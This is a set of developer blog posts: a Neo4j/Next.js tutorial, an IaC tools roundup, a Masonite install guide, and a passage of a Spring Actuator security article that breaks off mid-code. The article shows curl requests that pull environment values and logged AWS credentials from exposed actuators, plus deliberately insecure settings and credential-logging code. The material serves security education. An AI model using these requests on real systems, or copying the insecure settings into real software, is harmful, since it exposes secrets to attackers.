// lib/neo4j.js
const driver = neo4j.driver(
process.env.NEO4J_URI,
neo4j.auth.basic(
process.env.NEO4J_USERNAME,
process.env.NEO4J_PASSWORD
)
)
```
When executing a Cypher statement against a Neo4j instance, you need to open a session, and execute the statement within a read or write transaction. This can become a bit cumbersome after a while, so instead, I recommend writing helper functions for read and write queries:
```js
// lib/neo4j.js
export async function read(cypher, params = {}) {
// 1. Open a session
const session = driver.session()
try {
// 2. Execute a Cypher Statement
const res = await session.executeRead(tx => tx.run(cypher, params))
// 3. Process the Results
const values = res.records.map(record => record.toObject())
return values
}
finally {
// 4. Close the session
await session.close()
}
}
export async function write(cypher, params = {}) {
// 1. Open a session
const session = driver.session()
try {
// 2. Execute a Cypher Statement
const res = await session.executeWrite(tx => tx.run(cypher, params))
// 3. Process the Results
const values = res.records.map(record => record.toObject())
return values
}
finally {
// 4. Close the session
await session.close()
}
}
```
If you want a deeper dive into this code or best practices I recommend that you check out the [Neo4j & Node.js Course](https://graphacademy.neo4j.com/courses/app-nodejs/?ref=dev.to) on GraphAcademy.
Now that we have a way to query Neo4j, let's look at the options for Data Fetching in Next.js
## Data Fetching in Next.js
Next.js allows the rendering of content in several ways.
1. Static-site Generation (SSG) - where static HTML pages are generated at _build_ time
2. Server-side Rendering (SSR) - HTML is generated server-side as a request comes in
3. Client-side Rendering (CSR) - HTTP requests are executed in the browser with JavaScript and the response updates the DOM
Depending on your use case, you may need a mixture of these methods. Say you are running a movie recommendation site, it may make sense to use SSG to pre-build marketing pages. Movie information is held in a database and changes regularly, so these pages should be rendered by the server using SSR. When a user comes to rate a movie, the interaction should take place via an API request and the result rendered using CSR.
Let's take a look at the implementation of each of these records.
### Static Page Generation
Let's say, for example, that generic genre pages won't change often and they don't require any user interaction. By generating static pages, we can serve cached versions of the pages and take the load away from the server.
Any component in the `pages/` directory which exports a `getStaticProps()` function (known as a Page) will be generated at build time and served as a static file.
Components created in the pages folder will automatically be mapped to a route. To create a page that will be available at `/genres` you will need to create a `pages/genres/index.jsx` file. The component needs to export a `default` function which returns a JSX component, and a `getStaticProps()` function.
First, to get the data required by the component, create the `getStaticProps()` function and execute [this Cypher statement](https://github.com/neo4j-graphacademy/neoflix-cypher/blob/main/cypher/3-backlog/1-browse-genres/genre-details.cypher) in a _read_ transaction.
```js
// pages/genres/index.jsx
export async function getStaticProps() {
const res = await read(`
MATCH (g:Genre)
WHERE g.name <> '(no genres listed)'
CALL {
WITH g
MATCH (g)<-[:IN_GENRE]-(m:Movie)
WHERE m.imdbRating IS NOT NULL AND m.poster IS NOT NULL
RETURN m.poster AS poster
ORDER BY m.imdbRating DESC LIMIT 1
}
RETURN g {
.*,
movies: toString(size((g)<-[:IN_GENRE]-(:Movie))),
poster: poster
} AS genre
ORDER BY g.name ASC
`)
const genres = res.map(row => row.genre)
return {
props: {
genres,
}
}
}
```
Anything returned inside `props` from this function will be passed as a prop into the default component.
Now, export a default function which displays a list of Genres.
```jsx
// pages/genres/index.jsx
export default function GenresList({ genres }) {
return (
<div>
<h1>Genres</h1>
<ul>
{genres.map(genre => <li key={genre.name}>
<Link href={`/genres/${genre.name}`}>{genre.name} ({genre.movies})</Link>
</li>)}
</ul>
</div>
)
}
```
This should generate an unordered list of links for each Genre:

Looking good...
If you run the `npm run build` command, you will see a `genres.html` file inside the `.next/server/pages/` directory.
### Using Neo4j for Server-side Rendering
The movie list on each genre page may change often, or you may wish to add extra interaction to the page. In this case, it makes sense to render this page on the server. By default, Next.js will cache this page for a short amount of time which is perfect for websites with high amounts of traffic.
Each genre link on the previous page links to `/genres/[name]` - for example `/genres/Action`. By creating a `pages/genres/[name].jsx` file, Next.js knows automatically to listen for requests on any URL starting with `/genres/` and detect anything after the slash as a `name` URL parameter.
This can be accessed by the `getServerSideProps()` function, which will instruct Next.js to render this page using Server-side Rendering as the request comes in.
The `getServerSideProps()` function should be used to get the data required to render the page and return it inside a `props` key.
```js
export async function getServerSideProps({ query, params }) {
const limit = 10
const page = parseInt(query.page ?? '1')
const skip = (page - 1) * limit
const res = await read(`
MATCH (g:Genre {name: $genre})
WITH g, size((g)<-[:IN_GENRE]-()) AS count
MATCH (m:Movie)-[:IN_GENRE]->(g)
RETURN
g { .* } AS genre,
toString(count) AS count,
m {
.tmdbId,
.title
} AS movie
ORDER BY m.title ASC
SKIP $skip
LIMIT $limit
`, {
genre: params.name,
limit: int(limit),
skip: int(((query.page || 1)-1) * limit)
})
const genre = res[0].genre
const count = res[0].count
return {
props: {
genre,
count,
movies: res.map(record => record.movie),
page, skip, limit,
}
}
}
```
In the example above, I get the movie name from the `params` object in the request context which is passed as the only argument to the `getServerSideProps()` function. I also attempt to get the `?page=` query parameter from the URL to provide a paginated list of movies.
These values will again be passed as props into the _default_ function, and can therefore be used to list the movies and pagination links.
```jsx
export default function GenreDetails({ genre, count, movies, page, skip, limit }) {
return (
<div>
<h1>{genre.name}</h1>
<p>There are {count} movies listed as {genre.name}.</p>
<ul>
{movies.map(movie => <li key={movie.tmdbId}>{movie.title}</li>)}
</ul>
<p>
Showing page #{page}. <br />
{page > 1 ? <Link href={`/genres/${genre.name}?page=${page-1}`}> Previous</Link> : ' '}
{' '}
{skip + limit < count ? <Link href={`/genres/${genre.name}?page=${page+1}`}>Next</Link> : ' '}
</p>
</div>
)
}
```
Next.js then renders a list of movies with each request.

### Using Neo4j for Client-side Data Fetching
As it stands, for each click of the Previous and Next links above, the entire page will reload which isn't ideal. Although this is a trivial example so far, loading KBs worth of HTML again to render the header and footer means additional load on the server and more data sent over the wire.
Instead, you could build a React component that would load the list of movies asynchronously through a client-side HTTP request. This would mean that the list of movies could be updated without reloading the entire page, providing the end-user with a smoother viewing experience.
To support this, we will have to create a [API Route](https://nextjs.org/docs/api-routes/introduction) which will return a list of movies as JSON.
Any file in the `pages/api/` directory is treated as a route handler, a single default exported function which accepts request and response parameters, and expects an HTTP status and response to be returned.
So to create an API route to serve a list of movies at `http://locahost:3000/api/movies/[name]/movies`, create a new `movies.js` file in the `pages/api/genres/[name]` folder.
```js
// pages/api/genres/[name]/movies.js
export default async function handler(req, res) {
const { name } = req.query
const limit = 10
const page = parseInt(req.query.page as string ?? '1')
const skip = (page - 1) * limit
const result = await read<MovieResult>(`
MATCH (m:Movie)-[:IN_GENRE]->(g:Genre {name: $genre})
RETURN
g { .* } AS genre,
toString(size((g)<-[:IN_GENRE]-())) AS count,
m {
.tmdbId,
.title
} AS movie
ORDER BY m.title ASC
SKIP $skip
LIMIT $limit
`, {
genre: name,
limit: int(limit),
skip: int(skip)
})
res.status(200).json({
total: parseInt(result[0]?.count) || 0,
data: result.map(record => record.movie)
})
}
```
The function above executes a Cypher statement in a read transaction, processes the results and returns the list of
movies as a JSON response.
A quick GET request to http://localhost:3000/api/genres/Action/movies shows a list of movies:
```json
[
{
"tmdbId": "72867",
"title": "'Hellboy': The Seeds of Creation"
},
{
"tmdbId": "58857",
"title": "13 Assassins (Jûsan-nin no shikaku)"
},
/* ... */
]
```
This API handler can then be called through a React component in a `useEffect` hook.
```jsx
// components/genre/movie-list.tsx
export default function GenreMovieList({ genre }: GenreMovieListProps) {
const [page, setPage] = useState<number>(1)
const [limit, setLimit] = useState<number>(10)
const [movies, setMovies] = useState<Movie[]>()
const [total, setTotal] = useState<number>()
// Get data from the API
useEffect(() => {
fetch(`/api/genres/${genre.name}/movies?page=${page}&limit=${limit}`)
.then(res => res.json())
.then(json => {
setMovies(json.data)
setTotal(json.total)
})
}, [genre, page, limit])
// Loading State
if (!movies || !total) {
return <div>Loading...</div>
}
return (
<div>
<ul>
{movies.map(movie => <li key={movie.tmdbId}>{movie.title}</li>)}
</ul>
<p>Showing page {page}</p>
{page > 1 && <button onClick={() => setPage(page - 1)}>Previous</button>}
{page * limit < total && <button onClick={() => setPage(page + 1)}>Next</button>}
</div>
)
}
```
The component is then in charge of pagination and any update to the list doesn't re-render the entire page.
## Conclusion
This is far from a comprehensive guide to Next.js or Neo4j integrations but hopefully, it serves as a quick reference for anyone wondering the best way to integrate Neo4j, or any other database for that matter, with a Next.js application.
All of the code from this experiment is [available on Github](https://github.com/adam-cowley/neo4j-nextjs-example).
If you are interested in learning more about Next.js, they have put together a [course for developers to learn the basics](https://nextjs.org/learn/basics/create-nextjs-app).
If you would like to learn more about Neo4j, then I would recommend taking a look at the [Beginners Neo4j Courses on GraphAcademy](https://graphacademy.neo4j.com?ref=dev.to). If you want to know more about how to use the Neo4j JavaScript Driver in a Node.js or Typescript project, I would also recommend the [Building Neo4j Applications with Node.js course](https://github.com/neo4j-graphacademy/app-nodejs?ref=dev.to).
If you have any comments or questions, feel free to [reach out to me on Twitter](https://twitter.com/adamcowley). | adamcowley |
1,232,883 | 10 Best Infrastructure-as-Code Tools for Automating Deployments in 2022 | IT technologies continue to evolve at an unprecedented pace. From cloud computing to DevOps and... | 0 | 2022-10-27T20:16:11 | https://dev.to/vishnube/10-best-infrastructure-as-code-tools-for-automating-deployments-in-2022-51cp | deployments, webdev, programming, software | IT technologies continue to evolve at an unprecedented pace. From cloud computing to DevOps and artificial intelligence (AI) to internet of things (IoT), the technology landscape has unlocked potential opportunities for IT businesses to generate value.
The enterprise IT infrastructure has become crucial for modern-day digital business. It is because it facilitates the compute, network and data capabilities required to run business-critical software applications. The key role of infrastructure goes beyond production environs. It spreads across the complete development process. The infrastructure includes a host of components including servers, load balancers, firewalls, and databases. They also include [DevOps tools](https://dzone.com/articles/top-25-devops-tools-for-2021), [CI/CD platforms](https://dzone.com/articles/devops-cicd-tools-to-watch-out-for-in-2022), staging environments, and [testing](https://dzone.com/articles/how-to-enhance-your-deployment-with-continuous-tes) tools. But there’s a catch here.
With the rapidly changing technology landscape, the traditional approaches to infrastructure are hampering businesses to adapt, innovate, and thrive optimally. The manual process of managing infrastructure has become obsolete and fails to meet the demands of the DevOps-based high-speed software development cycles.
The need of the hour is an infrastructure focused on [continuous innovation](https://dzone.com/articles/a-cloud-platform-to-speed-up-your-devops), automation, and optimization. An infrastructure that can help organizations keep pace with rapid software development and accelerated technological change. And, at this juncture, Infrastructure as Code (IaC) tools have emerged as the key to navigating this challenge. Let’s delve deep into the details:
## What Are Infrastructure-as-Code (IaC) Tools?
Infrastructure-as-Code (IaC) is the process of codifying and managing underlying IT infrastructure as software. It enables DevOps teams to automatically manage, monitor, and provision resources, instead of manually configuring multifarious hardware devices and operating systems. IaC is also referred to as programmable or software-defined infrastructure.
With IaC tools at their disposal, [DevOps](https://dzone.com/articles/devops-toolchain-for-beginners) teams can easily edit and distribute configurations, while ensuring a stable state of the infrastructure. The IaC tools allow easy integration of infrastructure into the version control mechanisms and provide the ability to imbibe automation for infrastructure provisioning and management.
## What Are the Benefits of Using Infrastructure as Code Tools?
IaC tools have transformed the way IT infrastructure is provisioned and managed today. They paved the way for complete automation and configuration of infrastructure, with its elements such as physical servers, configuring networks, and databases being treated similarly to software. This empowered development teams to adopt a range of DevOps and [Agile](https://dzone.com/articles/continuous-delivery-vs) practices that automate and fast-track software development processes. The IaC tools helped teams to leverage best practices such as continuous integration (CI), continuous delivery (CD), and test-driven development (TDD). Moreover, IaC enabled businesses to make the most of deployment orchestration, automated testing libraries, and version control systems (VCS). Besides these salient features, the IaC tools offered a host of businesses benefits as follows:
**High Transparency and Accountability**
The IaC source code files are versioned, and configuration control. This bestows teams with high traceability, rollbacks, and branching.
**Improved Configuration Consistency**
Unplanned changes or updates lead to asymmetric development, testing, staging, and production environment. This, in turn, results in configuration drift. This is where IaC tools come in.
IaC helps avoid configuration drift by provisioning identical and reproducible environs every time. Moreover, this environment can be scaled as per the demands by leveraging the centralized/reusable module with the reserved configurations as many times as needed.
**Enhanced Speed and Efficiency**
With IaC tools, teams can set up infrastructure swiftly within a short turnaround time by simply running a uniform code stored in SCM, making it repeatable and scalable. This can be implemented at all stages of the application delivery lifecycle, from the development to the production stage. This results in more efficient and faster software development.
**Improved Cloud Utilization**
In a bid to gain the best of both clouds, businesses across the globe are leveraging multi-cloud and hybrid cloud environments. However, multi and hybrid clouds have multifarious software-defined APIs, giving rise to unwanted bottlenecks. And IaC tools are the best way to abstract the layers from the heterogeneity of the cloud.
**Cost Optimization**
As infrastructure as code tools eliminate the need for resources in terms of time, budget, and staff to manually provision, scale, and manage the infrastructure, businesses can save potential costs. Moreover, as IaC is platform-agnostic, businesses can leverage cloud computing solutions and benefit from its advantages such as flexibility and pay-as-you-go pricing. They can also save costs by deploying automation strategies that help technical teams to relieve error-prone, manual tasks and divert their valuable time towards developing innovative and mission-critical applications.
## What Are the Must-have Features of an Iac Tool?
The above benefits emphasize the need for IaC tools in the present-day DevOps world. But choosing the right set of IaC tools that rightly fit the business needs can be a herculean task. This is because there are numerous IaC tools available in the market, with a wide range of overlapping features and differences. Taking due cognizance of this challenge, we have curated the must-have features of an IaC tool to help you choose the best tool for your organization:
**Ease of Use**
One of the most prominent USPs of an IaC tool is its ease of use. The tool must make it simple to configure, deploy, and manage IaC across numerous infrastructure environments.
**Multi-cloud Compatibility**
Organizations across the world are now moving to multi-cloud to lower the risk of cloud downtime and business outage. Moreover, they gain the flexibility to use the best possible cloud for each workload, to improve performance. So, IaC tools must be multi-cloud compatible to enable businesses to manage infrastructure across multiple cloud environments. The IaC platform must be designed from the ground up to meet the demands of the modern cloud.
**Adoption by Industry Experts**
Before adopting infrastructure as a code tool, businesses must do some research on how the tool is adopted across the industry. This research helps in understanding the ins and outs of the tool. As there are innumerable IaC tools available in the market, look for tools that are adopted by experts in your industry to make your investment count. In this way, you avoid any chances of going astray.
**Scalability**
The IaC tool must enable unlimited scalability for managing IT resources. Traditionally, a team's scalability is limited by the team's size, skillset, and the time it can devote to the configuration and management of infrastructure. In order to gain an edge in the modern world, the IaC tool must remove this barrier by enabling teams to configure a large number of resources very quickly. This is especially important as many IT environs today must scale up and down quickly and efficiently.
**Reusability**
Reusability is one of the prominent must-have features of an IaC tool. The reusability of IaC empowers developers with the ability to script once and use that code multiple times, achieving great economies of scale, efficiency, and time savings.
Now, let’s have a glance at the best infrastructure as code tools that helps DevOps teams to optimally automate infrastructure deployment and management:
## The Top 10 IaC Tools To Automate Deployments in 2022
**Terraform**
[Terraform](https://dzone.com/articles/how-to-develop-terraform-custom-provider) is an open-source infrastructure-as-a-code tool that uses Hashicorp Configuration Language (HCL), which is one of the easiest IaC languages. The tool comes with a host of benefits, making it one of the most popular IaC tools. Terraform tool is multi-cloud compatible and is used for codifying the management of any cloud and on-premises resources. Simply put, you can provision, change, and version resources in any environment.
Terraform uses declarative config files to create new resources, manage the existing ones, and remove those that are unused. This open-source tool is easily readable and uses modules to easily configure your code and call your resources. Common use cases of Terraform include automate infrastructure provisioning, multi-cloud deployment, Kubernetes management, virtual machine image management, existing CI/CD workflow integration, and policy as code.
**Ansible**
After Terraform, [Ansible](https://dzone.com/articles/simplifying-terraform-deployments-with-ansible-par) is the most preferred IaC tool in the world. It is an imperative IaC tool, so it not only provisions infrastructure but also manages the configuration of the services. Ansible is a simple IT automation platform that helps automate cloud provisioning, configuration management, application deployment, and intra-service orchestration, among other IT requirements.
The IaC tool uses no agents and custom security infrastructure, making it easy to deploy. Moreover, the tool’s code is written in a very simple language YAML in the form of Ansible Playbooks, allowing users to describe their automation jobs in an easy manner. Users can also expand the features of the Ansible tool by writing custom Ansible modules and plugins.
**Chef**
Chef is another top IaC tool used by DevOps engineers to develop and deploy secure and scalable infrastructure automation across multi-OS, multi-cloud, on-prem, hybrid, and complex legacy architectures. This configuration management tool leverages open source community-based software development and enterprise-class support.
The Chef IaC tool uses Ruby-based DSL to create ‘recipes’ and ‘cookbooks’, which include step by step guide to achieving desired configuration stage for applications on an existing server. The tool is cloud-agnostic and is compatible with major clouds such as AWS, Azure, and Google Cloud. Some of the use cases of the Chef tool are consistent configuration, system hardening, hybrid cloud control, automated remediation, and continuous delivery pipeline automation.
**Puppet**
Puppet has garnered a spot in the top 10 IaC tools for the scalable approach it brings to infrastructure automation. Since 2005, Puppet’s Infrastructure as Code has helped over 40,000 organizations, including 80% of the Global 5000, to simplify the complexity of their IT infrastructure and fortify their security posture, compliance standards, and business resiliency.
Puppet IaC tool is written in Ruby-based DSL and uses a declarative approach to manage configuration on Unix and Windows operating systems. It integrates with all the leading cloud platforms such as AWS, Azure, Google Cloud, and VMware, enabling multiple cloud automation. Puppet is available in both open-source and enterprise versions.
**SaltStack**
Offered by VMWare, SaltStack is an open-source configuration management tool based on Python language. It is an easy-to-use IaC tool for provisioning, deploying, and configuring infrastructure on any platform at a high speed. The key selling point of this IaC tool is its remote execution engine that creates high-speed, bi-directional communication networks for a group of networks. It even comes with SSH support that can offer agentless mode. Moreover, the tool has a scheduler that enables you to schedule how often the managed servers should run your code.
The SaltStack tool enables businesses to create simple, human-readable infrastructure-as-code to provision and configure systems and software across virtualized, hybrid, and public cloud environments. You can manage and secure your infrastructure with powerful automation and orchestration. With the Salt event-driven automation engine, one can define the state of a system and auto-remediate as soon as a drift occurs.
**AWS CloudFormation**
CloudFormation is an Infrastructure as Code tool that is deeply integrated into the AWS cloud. It enables users to model, provision, and manage infrastructure and resources across all AWS accounts and regions through a single operation. One can easily code their infrastructure from scratch with the CloudFormation templates language, which is in either YAML or JSON format.
CloudFormation empowers users to easily automate, test, and deploy infrastructure templates with DevOps, and CI/CD automation. Moreover, with this IaC tool, teams can run anything from a single Amazon Elastic Compute Cloud (EC2) instance to a complex multi-region application. The last piece of the puzzle is the AWS Free Tier which offers 1000 handler operations per month per account.
**Google Cloud Deployment Manager**
As the name suggests, Google Cloud Deployment Manager is an infrastructure deployment tool offered by Google Cloud. It automates the creation, configuration, provisioning, and management of resources on the Google Cloud Platform. This IaC tool enables users to specify all the resources needed for their application in a declarative format using YAML. Python or Jinja2 templates can also be used to specify the configuration. Moreover, it allows the reuse of common deployment paradigms such as load-balanced, auto-scaled instance groups.
With this popular IaC tool, teams can write flexible templates and configuration files for creating deployments that include a host of Google Cloud services, such as Compute Engine, Cloud Storage, and Cloud SQL.
**Azure Resource Manager (ARM)**
Microsoft has gone the extra mile to meet the evolving needs of its massive Azure customers by introducing Azure Resource Manager, infrastructure deployment, and management service. This Azure-specific IaC tool facilitates a management layer that allows users to create, update, and delete resources in their Azure account. It also offers management features, including access control, locks, and tags, to efficiently secure and organize resources after deployment. The tool also comes with Role-Based Access Control (RBAC) to enable users to control access to all the resources within a resource category.
With an ARM, teams can quickly redeploy their infrastructure several times throughout the application development lifecycle, while maintaining consistency in the state. Moreover, they can manage their infrastructure through declarative templates instead of scripts.
**Vagrant**
Developed by the same creator of Terraform, HashiCorp, Vagrant is an IaC tool most preferred by professionals using a small number of virtual machines rather than those having large cloud infrastructures.
Vagrant enables teams to build and manage VM environments in a single workflow. The easy-to-configure, reproducible, and portable work environs, controlled by a single consistent workflow, reduce development environment setup time and maximizes productivity and flexibility.
Vagrant is compatible with VirtualBox, VMware, AWS, and other cloud service platforms and can integrate with provisioning tools such as shell scripts, Chef, and Puppet.
**Pulumi**
Though it is a newer IaC tool in the market, Pulumi managed to bag a spot in this list of best IaC tools because of its more modern approach to coding. In contrast to other IaC tools that use Python, YAML, JSON, or Ruby language, Pulumi uses powerful programming languages such as C++, Python, Go, and JS to code the instructions. This makes Pulumi a genuine Infrastructure as a Code tool. This IaC tool is available in open-source and enterprise versions.
## How To Choose the Right IaC Tool for Your Organization
Apart from the above-listed top 10 IaC tools, there are many other IaC tools that are gaining ground in the market in recent times. With so many options available, choosing an Infrastructure as Code tool is a tough decision, which requires thought, research, along with comparing the pros and cons of various tools. So, it's imperative to take time and go through various options available and find the best tool that meets your unique business needs.
Once an IaC tool is selected, ensure that your team works automating not only the infrastructure but also the delivery process with a robust Continuous Integration and Continuous Delivery (CI/CD) tool.
However…
**In Reality, There Is No One-size-Fits-all IaC Tool**
Though you can choose an Infrastructure as a code tool that best suits your business requirements, relying only on that one IaC tool is unwise. It is because there is no one-size-fits-all IaC tool that can completely suffice all your infrastructure needs in this ever-evolving IT world. So, in order to be future-ready and stay ahead of the dynamic infrastructure needs, businesses must rely on a set of IaC tools rather than a single tool. But there’s a catch here!
Businesses must orchestrate their choice of IaC tools to simplify and streamline the infrastructure workflow and manage tools efficiently. Without orchestrating these tools, the business may end up in the crosshairs of infrastructure management complexity. | vishnube |
1,233,648 | Learning blog-27 | A post by HONGJU KIM | 0 | 2022-10-28T10:15:55 | https://dev.to/hongju_kim_821dc285a52c96/learning-blog-27-2a2n |

| hongju_kim_821dc285a52c96 | |
1,233,919 | Search custom form with post request datatable | Hello everyone can i search with post request in data-tables? backend -> django frontend ->... | 0 | 2022-10-28T12:24:10 | https://dev.to/syedkashifnaqvi/search-custom-form-with-post-request-datatable-8nn | datatable | Hello everyone can i search with post request in data-tables?
backend -> django
frontend -> html/css jquery
please guide me i see in data-tables no option for post searching if you know any way please let me know
| syedkashifnaqvi |
1,234,000 | How to install Masonite On Windows | The Masonite Framework is a modern and developer-centric Python web framework. This framework works... | 0 | 2022-10-28T15:27:35 | https://dev.to/dilantsasi/how-to-install-masonite-on-windows-2llj | python, masonite, webdev, tutorial | The [Masonite](https://masoniteproject.com/) Framework is a modern and developer-centric Python web framework. This framework works hard to be fast and easy from installation to deployment so developers can go from concept to creation as quickly and efficiently as possible.
In this tutorial, I will show you how to install masonite 3.0 and set up a masonite project on a Windows computer
This tutorial assumes that you understand the basics of python and pip commands
## Requirements
1. Python 3.6+
2. The latest version of OpenSSL
3. Pip3
## How to install masonite
The first thing to do is to open your command prompt and navigate to the directory where you want to get it installed.
```
cd c:\my\masonite\directory
```
Once in this folder, create a new folder for your masonite project. and change directory to it
```
mkdir my_app
cd my_app
```
One optional step you can go through is activating your virtual environment. You can use a virtual environment if you don’t want to install all of masonite’s dependencies on your systems Python.
```
python -m venv venv
.\venv\Scripts\activate
```
## Installing Masonite
Now we can install Masonite using the pip command. This will give us access to masonite’s craft command, which we can use to finish the installation steps for us. you can do so by running:
```
pip install masonite
```
Once Masonite installs you will now have access to the `craft` command-line tool. The craft command will become your best friend during your development.
You can ensure Masonite and craft are installed correctly by running:
```
craft
```
You should see a list of a few commands like `install` and `new`
Creating our Project
From the commands you saw above, we will be using `new` command to create our project. To create a new project, just run:
```
craft new
```
This will also run `craft install` which will install our dependencies.
This will get the latest Masonite project template and unzip it for you. We need to go into our new project directory and install the dependencies in our `requirements.txt` file
Now that Masonite has been successfully installed, there will be more commands available in the craft. You can check it out by running
```
craft
```
## Running The Server
Our setup is complete; all that is left to do is to run our server and view our new masonite-powered Website in the Browser. So we get that done by running:
```
craft serve
```
The command will prepare everything for us and provide an address we can use to view our new website in the browser.
> **Note!**
> When coming to your address in the command prompt, do not use `CTR + c` as it will stop the server that is currently running. Instead, highlight, right-click, and copy the address.

That is it. You have set up your first website with masonite. Feel free to add your comments for further discussion.
| dilantsasi |
1,234,486 | Spring Actuator - Stealing Secrets Using Spring Actuators - Part 1: | Spring is a set of frameworks for developing Applications in Java. It is widely used, and so it is... | 20,295 | 2022-10-28T20:19:00 | https://tutorialboy24.blogspot.com/2022/09/spring-actuator-stealing-secrets-using.html | cybersecurity, infosec, springboot, informationsecurity | [Spring](https://spring.io/) is a set of frameworks for developing Applications in Java. It is widely used, and so it is not unusual to encounter it during a security audit or penetration test. One of its features that I recently encountered during a Whitebox audit is actuators. In this series of articles, I will use them as a case study for security testing - first describing the risk involved in exposing actuators to the Internet by demonstrating how they can be used to steal secrets from your applications, using a basic Spring application as a case study. In the next parts of the series, I will discuss how to detect misconfiguration using static code analysis and dynamic testing, and finally, how you can secure those actuators that you absolutely cannot leave turned off.
## What are Actuators?
[Actuators](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html) expose information about the running Spring application via (amongst others) a REST API and can be used to retrieve data from the system, or even make configuration changes if configured (in)correctly. They can be quite helpful in debugging or monitoring a Spring application, but if you expose them too widely, things can get dangerous very quickly.
By default, [only the health check endpoint is enabled over REST](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html#actuator.endpoints.exposing), listening at /actuator/health. However, it is possible to enable additional endpoints, for example, to expose metrics to Prometheus for monitoring. This can be done through settings in the relevant .properties file (or its YAML equivalent):
`# Enable Prometheus endpoint in addition to health check
management.endpoints.web.exposure.include=health,prometheus
It is also possible to enable all endpoints for access over REST, by using the following setting in the relevant .properties file:`
`# Do not do this! This is insecure!
management.endpoints.web.exposure.include=*
This is the config that I found during a recent engagement - and since the application was explicitly configured to expose all actuators without any authentication, I was curious to see what other actuators exist, and how they could be leveraged to attack the application. The result was this article series (and a call to the customer, telling them to make some changes to their configuration right now).`
## Exploiting Public Actuators
Conveniently, Spring provides a [list of all actuators](https://docs.spring.io/spring-boot/docs/2.5.6/reference/html/actuator.html#actuator.endpoints) that are present by default and can be enabled. They include actuators for reading (and writing!) the log configuration, the application environment (including environment variables), and even the logs of the application. Even more conveniently, by default, it will show you the list of enabled actuators if you simply access /actuator, removing the guesswork out of determining which actuators you have to work with.
I've created a [basic, vulnerable Spring application ](https://github.com/malexmave/blog-spring-actuator-example)that exposes all endpoints if you want to follow along at home. Running it locally on your machine and accessing the Spring actuators endpoint, you will get the following output:
`$ curl localhost:8081/actuator | jq .
{
"_links": {
"self": {
"href": "http://localhost:8081/actuator",
"templated": false
},
"beans": {
"href": "http://localhost:8081/actuator/beans",
"templated": false
},
"caches": {
"href": "http://localhost:8081/actuator/caches",
"templated": false
},
"caches-cache": {
"href": "http://localhost:8081/actuator/caches/{cache}",
"templated": true
},
"health-path": {
"href": "http://localhost:8081/actuator/health/{*path}",
"templated": true
},
"health": {
"href": "http://localhost:8081/actuator/health",
"templated": false
},
"info": {
"href": "http://localhost:8081/actuator/info",
"templated": false
},
"conditions": {
"href": "http://localhost:8081/actuator/conditions",
"templated": false
},
"configprops": {
"href": "http://localhost:8081/actuator/configprops",
"templated": false
},
"configprops-prefix": {
"href": "http://localhost:8081/actuator/configprops/{prefix}",
"templated": true
},
"env-toMatch": {
"href": "http://localhost:8081/actuator/env/{toMatch}",
"templated": true
},
"env": {
"href": "http://localhost:8081/actuator/env",
"templated": false
},
"logfile": {
"href": "http://localhost:8081/actuator/logfile",
"templated": false
},
"loggers-name": {
"href": "http://localhost:8081/actuator/loggers/{name}",
"templated": true
},
"loggers": {
"href": "http://localhost:8081/actuator/loggers",
"templated": false
},
"heapdump": {
"href": "http://localhost:8081/actuator/heapdump",
"templated": false
},
"threaddump": {
"href": "http://localhost:8081/actuator/threaddump",
"templated": false
},
"metrics-requiredMetricName": {
"href": "http://localhost:8081/actuator/metrics/{requiredMetricName}",
"templated": true
},
"metrics": {
"href": "http://localhost:8081/actuator/metrics",
"templated": false
},
"scheduledtasks": {
"href": "http://localhost:8081/actuator/scheduledtasks",
"templated": false
},
"mappings": {
"href": "http://localhost:8081/actuator/mappings",
"templated": false
}
}
}`
There have been some articles about exploiting actuators, which can even lead to remote code execution (RCE) on the machine running the application. [Veracode discussed a series of paths to RCE in 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) (although some of their methods no longer work on modern Spring versions). In this article, I wanted to highlight a few additional endpoints that can prove dangerous, to illustrate why you should be careful with this feature.
## Exposing the Environment
Let's assume the application you are running is using environmental variables to pull in configuration values:
`public class SecretConfig {
protected static String DATABASE_CONNECTION = System.getenv("DB_CONN");
protected static String SECRET_AWS_ACCESS_KEY = System.getenv("AWS_SECRET_KEY");
protected static String SECRET_AWS_ACCESS_TOKEN = System.getenv("AWS_TOKEN");
}`
One of the endpoints allows us to take a peek at the application environment. Let's see if we can get these tokens using the env actuator:
`$ curl localhost:8081/actuator/env | jq .
// ... lots of stuff
"DB_CONN": {
"value": "psql://server/db",
"origin": "System Environment Property \"DB_CONN\""
},
// ... lots of stuff
So, we can read the DB connection string in plaintext from the actuator. Sweet. What about the AWS credentials? Well, the situation is a bit more complicated here:
COPY
"AWS_SECRET_KEY": {
"value": "******",
"origin": "System Environment Property \"AWS_SECRET_KEY\""
},
"AWS_TOKEN": {
"value": "******",
"origin": "System Environment Property \"AWS_TOKEN\""
},`
As you can see, the data is being redacted. Spring automatically tries to redact sensitive values in the Actuator output, based on the name of the environment variable. If we had been more careless and chosen a different name, the data would be right here for the taking, but sadly, Spring has prevented us from trivially stealing the values here. But, there are of course other ways to achieve this goal.
## Reading Logs
Let's assume that your application has the following code:
`@RequestMapping("/")
public String index() {
logger.info("Entering hello world function...");
String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
// Log the AWS credentials for debugging,
// so we know if they got loaded correctly.
logger.info("Dumping AWS credentials for debugging purposes: Key: {} Token: {}", AWS_KEY, AWS_TOKEN);
// Do some work with the AWS credentials
return "Hello World!";
}`
Assuming it is configured to log to a file, Spring helpfully exposes an endpoint called /actuator/logfile. Let's take a look at what this can give us:
`$ curl localhost:8081/actuator/logfile
[...]
2022-08-24 13:45:14.813 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Entering hello world function...
2022-08-24 13:45:14.814 INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest`
And there we go - we can pull the AWS credentials right from the logs.
This is, admittedly, a bit far-fetched. No one in their right mind would log AWS credentials in a production environment, right? Okay, then let's make a few changes to the code to reflect this:
`@RequestMapping("/")
public String index() {
logger.info("Entering hello world function...");
String AWS_KEY = SecretConfig.SECRET_AWS_ACCESS_KEY;
String AWS_TOKEN = SecretConfig.SECRET_AWS_ACCESS_TOKEN;
// This is safe, as this logs on the DEBUG level,
// while in production, the loglevel is set to INFO,
// so this will never be logged
